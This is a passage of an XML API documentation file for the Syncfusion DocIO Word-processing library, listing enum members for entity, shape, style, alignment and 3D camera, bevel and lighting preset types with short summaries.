        <member name="F:Syncfusion.DocIO.DLS.EntityType.FieldMark">
            <summary>
            Field mark in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.MergeField">
            <summary>
            Merge field in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.SeqField">
            <summary>
            Sequence Field Tag in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.EmbededField">
            <summary>
            Embeded in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.ControlField">
            <summary>
            Control field in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.TextFormField">
            <summary>
            Text form field in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.DropDownFormField">
            <summary>
            Drop down form field in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.CheckBox">
            <summary>
            Check box in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.BookmarkStart">
            <summary>
            Bookmark start in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.BookmarkEnd">
            <summary>
            Bookmark end in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.Shape">
            <summary>
            Shape in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.Comment">
            <summary>
            Comment in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.Footnote">
            <summary>
            Footnote in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.TextBox">
            <summary>
            TextBox in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.Break">
            <summary>
            Break in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.Symbol">
            <summary>
            Symbol in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.TOC">
            <summary>
            Table of content in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.XmlParaItem">
            <summary>
            Xml Paragraph Item in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.Undefined">
            <summary>
            Undefiened element
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.Chart">
            <summary>
            Chart in the Word document
            </summary>
            <remarks>This enum is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin platforms.</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.CommentMark">
            <summary>
            Comment mark in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.CommentEnd">
            <summary>
            Comment End in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.OleObject">
            <summary>
            OLE Object in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.AbsoluteTab">
            <summary>
            Absolute Tab in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.AutoShape">
            <summary>
            Absolute Tab in the Word document
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HeaderFooterType">
            <summary>
            Specifies type of the Header or Footer.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeaderFooterType.EvenHeader">
            <summary>
            Header for even numbered pages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeaderFooterType.OddHeader">
            <summary>
            Header for odd numbered pages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeaderFooterType.EvenFooter">
            <summary>
            Footer for even numbered pages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeaderFooterType.OddFooter">
            <summary>
            Footer for odd numbered pages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeaderFooterType.FirstPageHeader">
            <summary>
            Header for the first page of the section. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeaderFooterType.FirstPageFooter">
            <summary>
            Footer for the first page of the section. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ShapeType">
            <summary>
            Specifies type of the Shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeType.Text">
            <summary>
            Specifies text shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeType.Rectangle">
            <summary>
            Specifies rectangle shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeType.Image">
            <summary>
            Specifies image shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeType.Arc">
            <summary>
            Specifies arc shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeType.Ellipse">
            <summary>
            Specifies ellipse shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeType.Line">
            <summary>
            Specifies line shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeType.Path">
            <summary>
            Specifies path shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeType.Bezier">
            <summary>
            Specifies bezier shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeType.Pie">
            <summary>
            Specifies pie shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeType.Polygon">
            <summary>
            Specifies polygon shape.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.StyleType">
            <summary>
            Specifies type of the style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.StyleType.ParagraphStyle">
            <summary>
            Paragraph style. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.StyleType.CharacterStyle">
            <summary>
            Character style. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.StyleType.TableStyle">
            <summary>
            Table style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.StyleType.NumberingStyle">
            <summary>
            Numbering style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.StyleType.OtherStyle">
            <summary>
            Other kind of style. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ParagraphItemType">
            <summary>
            Specifies type of the paragraph item.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.TextRange">
            <summary>
            Text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.Picture">
            <summary>
            Picture.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.Field">
            <summary>
            Field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.FieldMark">
            <summary>
            Field mark.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.MergeField">
            <summary>
            Merge field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.FormField">
            <summary>
            Form field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.CheckBox">
            <summary>
            Check box.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.TextFormField">
            <summary>
            Text form field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.DropDownFormField">
            <summary>
            Drop down form field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.SeqField">
            <summary>
            Sequence field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.EmbedField">
            <summary>
            Embedded field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.ControlField">
            <summary>
            Control field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.BookmarkStart">
            <summary>
            Start of bookmark.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.BookmarkEnd">
            <summary>
            End of bookmark.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.ShapeObject">
            <summary>
            Shape object.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.InlineShapeObject">
            <summary>
            Inline shape object.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.Comment">
            <summary>
            Comment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.Footnote">
            <summary>
            Footnote.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.TextBox">
            <summary>
            Textbox. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.Break">
            <summary>
            Break.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.Symbol">
            <summary>
            Symbol.
            </summary>    
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.TOC">
            <summary>
            Table of contents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.Chart">
            <summary>
            Chart.
            </summary>
            <remarks>This enum is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin platforms.</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItemType.OleObject">
            <summary>
            OLE object.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PageOrientation">
            <summary>
            Specifies orientation of the page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageOrientation.Portrait">
            <summary>
            Portrait page orientation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageOrientation.Landscape">
            <summary>
            Landscape page orientation.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PageAlignment">
            <summary>
            Specifies alignment of the text on a page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageAlignment.Top">
            <summary>
            Text is aligned at the top of the page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageAlignment.Middle">
            <summary>
            Text is aligned at the middle of the page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageAlignment.Justified">
            <summary>
            Text is spanned to fill the page. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageAlignment.Bottom">
            <summary>
            Text is aligned at the bottom of the page.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.VerticalAlignment">
            <summary>
            Specifies type of the vertical alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.VerticalAlignment.Top">
            <summary>
            Specifies top alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.VerticalAlignment.Middle">
            <summary>
            Specifies middle alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.VerticalAlignment.Bottom">
            <summary>
            Specifies bottom alignment.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ShadowAlignment">
            <summary>
            Specifies type of the shadow alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowAlignment.Top">
            <summary>
            Specifies top alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowAlignment.TopLeft">
            <summary>
            Specifies top left alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowAlignment.TopRight">
            <summary>
            Specifies top right alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowAlignment.Center">
            <summary>
            Specifies center alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowAlignment.Bottom">
            <summary>
            Specifies bottom alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowAlignment.BottomLeft">
            <summary>
            Specifies bottom left alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowAlignment.BottomRight">
            <summary>
            Specifies bottom right alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowAlignment.Left">
            <summary>
            Specifies Left alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowAlignment.Right">
            <summary>
            Specifies right alignment.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PresetMaterialType">
            <summary>
            Specifies type of the 3D Material type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.Clear">
            <summary>
            Specifies Clear type
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.DarkEdge">
            <summary>
            Specifies Dark Edge type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.Flat">
            <summary>
            Specifies flat type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.LegacyMatte">
            <summary>
            Specifies Legacy Matte type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.LegacyMetal">
            <summary>
            Specifies Legacy Metal type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.LegacyPlastic">
            <summary>
            Specifies Legacy plastic type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.LegacyWireframe">
            <summary>
            Specifies Legacy Wireframe type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.Matte">
            <summary>
            Specifies Matte type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.Metal">
            <summary>
            Specifies Metal type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.Plastic">
            <summary>
            Specifies Platic type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.Powder">
            <summary>
            Specifies Powder type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.SoftEdge">
            <summary>
            Specifies Soft Edge type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.SoftMetal">
            <summary>
            Specifies Soft Metal type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.TranslucentPowder">
            <summary>
            Specifies Translucent Powder type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PresetMaterialType.WarmMatte">
            <summary>
            Specifies Warm Matte type.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BevelPresetType">
            <summary>
            Specifies type of the Bevel Preset Type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BevelPresetType.Angle">
            <summary>
            Specifies Angle type
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BevelPresetType.ArtDeco">
            <summary>
            Specifies Art Deco type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BevelPresetType.Circle">
            <summary>
            Specifies Circle type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BevelPresetType.Convex">
            <summary>
            Specifies Convex type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BevelPresetType.CoolSlant">
            <summary>
            Specifies Cool Slant type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BevelPresetType.Cross">
            <summary>
            Specifies Cross type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BevelPresetType.Divot">
            <summary>
            Specifies Divot type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BevelPresetType.HardEdge">
            <summary>
            Specifies Hard Edge type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BevelPresetType.RelaxedInset">
            <summary>
            Specifies Relaxed Inset type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BevelPresetType.Riblet">
            <summary>
            Specifies Riblet type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BevelPresetType.Slope">
            <summary>
            Specifies Slope type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BevelPresetType.SoftRound">
            <summary>
            Specifies Soft Round type.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CameraPresetType">
            <summary>
            Specifies type of the Bevel Preset Type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricBottomDown">
            <summary>
            Specifies Isometric Bottom type
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricBottomUp">
            <summary>
            Specifies Isometric BottomUp type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricLeftDown">
            <summary>
            Specifies Isometric LeftDown type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricLeftUp">
            <summary>
            Specifies Isometric LeftUp type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricOffAxis1Left">
            <summary>
            Specifies Isometric OffAxis 1 Left type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricOffAxis1Right">
            <summary>
            Specifies Isometric OffAxis 1 Right type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricOffAxis1Top">
            <summary>
            Specifies Isometric OffAxis 1 Top type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricOffAxis2Left">
            <summary>
            Specifies Isometric OffAxis 2 Left type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricOffAxis2Right">
            <summary>
            Specifies Isometric OffAxis 2 Right type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricOffAxis2Top">
            <summary>
            Specifies Isometric OffAxis 2 Top type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricTopUp">
            <summary>
            Specifies Isometric Top Up type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveFront">
            <summary>
            Specifies Perspective Front type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveLeft">
            <summary>
            Specifies Perspective Left type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveRight">
            <summary>
            Specifies Perspective Right type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveBelow">
            <summary>
            Specifies Perspective Below type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveAbove">
            <summary>
            Specifies Perspective Above type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveRelaxedModerately">
            <summary>
            Specifies Perspective Relaxed Moderately type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveRelaxed">
            <summary>
            Specifies Perspective Relaxed type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveContrastingLeft">
            <summary>
            Specifies Perspective Contrasting Left type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveContrastingRight">
            <summary>
            Specifies Perspective Contrasting Right type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveHeroicExtremeLeft">
            <summary>
            Specifies Perspective Heroic Extreme Left type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveHeroicExtremeRight">
            <summary>
            Specifies Perspective Heroic Extreme Right type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.ObliqueTopLeft">
            <summary>
            Specifies Oblique TopLeft type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.ObliqueTopRight">
            <summary>
            Specifies Oblique TopRight type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.ObliqueBottomLeft">
            <summary>
            Specifies Oblique BottomLeft type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.ObliqueBottomRight">
            <summary>
            Specifies Oblique BottomRight type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.OrthographicFront">
            <summary>
            Specifies Orthographic Front type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricOffAxis3Bottom">
            <summary>
            Specifies Isometric OffAxis3 Bottom type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricOffAxis3Left">
            <summary>
            Specifies Isometric OffAxis3 Left type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricOffAxis3Right">
            <summary>
            Specifies Isometric OffAxis3 Right type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricOffAxis4Bottom">
            <summary>
            Specifies Isometric OffAxis4 Bottom type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricOffAxis4Left">
            <summary>
            Specifies Isometric OffAxis4 Left type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricOffAxis4Right">
            <summary>
            Specifies Isometric OffAxis4 Right type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricRightDown">
            <summary>
            Specifies Isometric RightDown type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricRightUp">
            <summary>
            Specifies Isometric RightUp type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.IsometricTopDown">
            <summary>
            Specifies Isometic TopDown type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyObliqueBottom">
            <summary>
            Specifies Legacy Oblique Bottom type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyObliqueBottomLeft">
            <summary>
            Specifies Legacy Oblique BottomLeft type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyObliqueBottomRight">
            <summary>
            Specifies Legacy Oblique BottomRight type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyObliqueFront">
            <summary>
            Specifies Legacy Oblique Front type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyObliqueLeft">
            <summary>
            Specifies Legacy Oblique Left type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyObliqueRight">
            <summary>
            Specifies Legacy Oblique Right type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyObliqueTop">
            <summary>
            Specifies Legacy Oblique Top type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyObliqueTopLeft">
            <summary>
            Specifies Legacy Oblique TopLeft type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyObliqueTopRight">
            <summary>
            Specifies Legacy Oblique TopRight type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyPerspectiveBottom">
            <summary>
            Specifies Legacy Perspective Bottom type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyPerspectiveBottomLeft">
            <summary>
            Specifies Legacy Perspective BottomLeft type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyPerspectiveBottomRight">
            <summary>
            Specifies Legacy Perspective BottomRight type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyPerspectiveFront">
            <summary>
            Specifies Legacy Perspective Front type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyPerspectiveLeft">
            <summary>
            Specifies Legacy Perspective Left type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyPerspectiveRight">
            <summary>
            Specifies Legacy Perspective Right type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyPerspectiveTop">
            <summary>
            Specifies Legacy Perspective Top type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyPerspectiveTopLeft">
            <summary>
            Specifies Legacy Perspective TopLeft type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.LegacyPerspectiveTopRight">
            <summary>
            Specifies Legacy Perspective TopRight type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.ObliqueBottom">
            <summary>
            Specifies Oblique Bottom type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.ObliqueLeft">
            <summary>
            Specifies Oblique Left type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.ObliqueRight">
            <summary>
            Specifies Oblique Right type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.ObliqueTop">
            <summary>
            Specifies Oblique Top type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveAboveLeftFacing">
            <summary>
            Specifies Perspective Above LeftFacing type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveAboveRightFacing">
            <summary>
            Specifies  Perspective Above RightFacing type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveContrastingLeftFacing">
            <summary>
            Specifies  Perspective Contrasting LeftFacing type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveContrastingRightFacing">
            <summary>
            Specifies Perspective Contrasting RightFacing type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveHeroicExtremeLeftFacing">
            <summary>
            Specifies Perspective Heroic Extreme LeftFacing type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveHeroicExtremeRightFacing">
            <summary>
            Specifies Perspective Heroic Extreme RightFacing type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveHeroicLeftFacing">
            <summary>
            Specifies Perspective Heroic LeftFacing type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CameraPresetType.PerspectiveHeroicRightFacing">
            <summary>
            Specifies Perspective Heroic RightFacing type.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.LightRigDirection">
            <summary>
            Specifies type of the LightRig Direction.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigDirection.T">
            <summary>
            Specifies top direction.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigDirection.TL">
            <summary>
            Specifies top left direction.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigDirection.TR">
            <summary>
            Specifies top right direction.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigDirection.C">
            <summary>
            Specifies center direction.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigDirection.B">
            <summary>
            Specifies bottom direction.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigDirection.BL">
            <summary>
            Specifies bottom left direction.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigDirection.BR">
            <summary>
            Specifies bottom right direction.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigDirection.L">
            <summary>
            Specifies Left direction.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigDirection.R">
            <summary>
            Specifies right direction.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.LightRigType">
            <summary>
            Specifies type of the Bevel Preset Type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.TwoPt">
            <summary>
            Specifies Isometric Bottom type
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.ThreePt">
            <summary>
            Specifies Two Pt type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.SunSet">
            <summary>
            Specifies Three Pt type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.SunRise">
            <summary>
            Specifies Sunrise type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.Soft">
            <summary>
            Specifies Soft type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.Morning">
            <summary>
            Specifies Morning type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.LegacyNormal1">
            <summary>
            Specifies Legacy Normal 1 type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.LegacyNormal2">
            <summary>
            Specifies Legacy Normal 2 type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.LegacyNormal3">
            <summary>
            Specifies Legacy Normal 3 type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.LegacyNormal4">
            <summary>
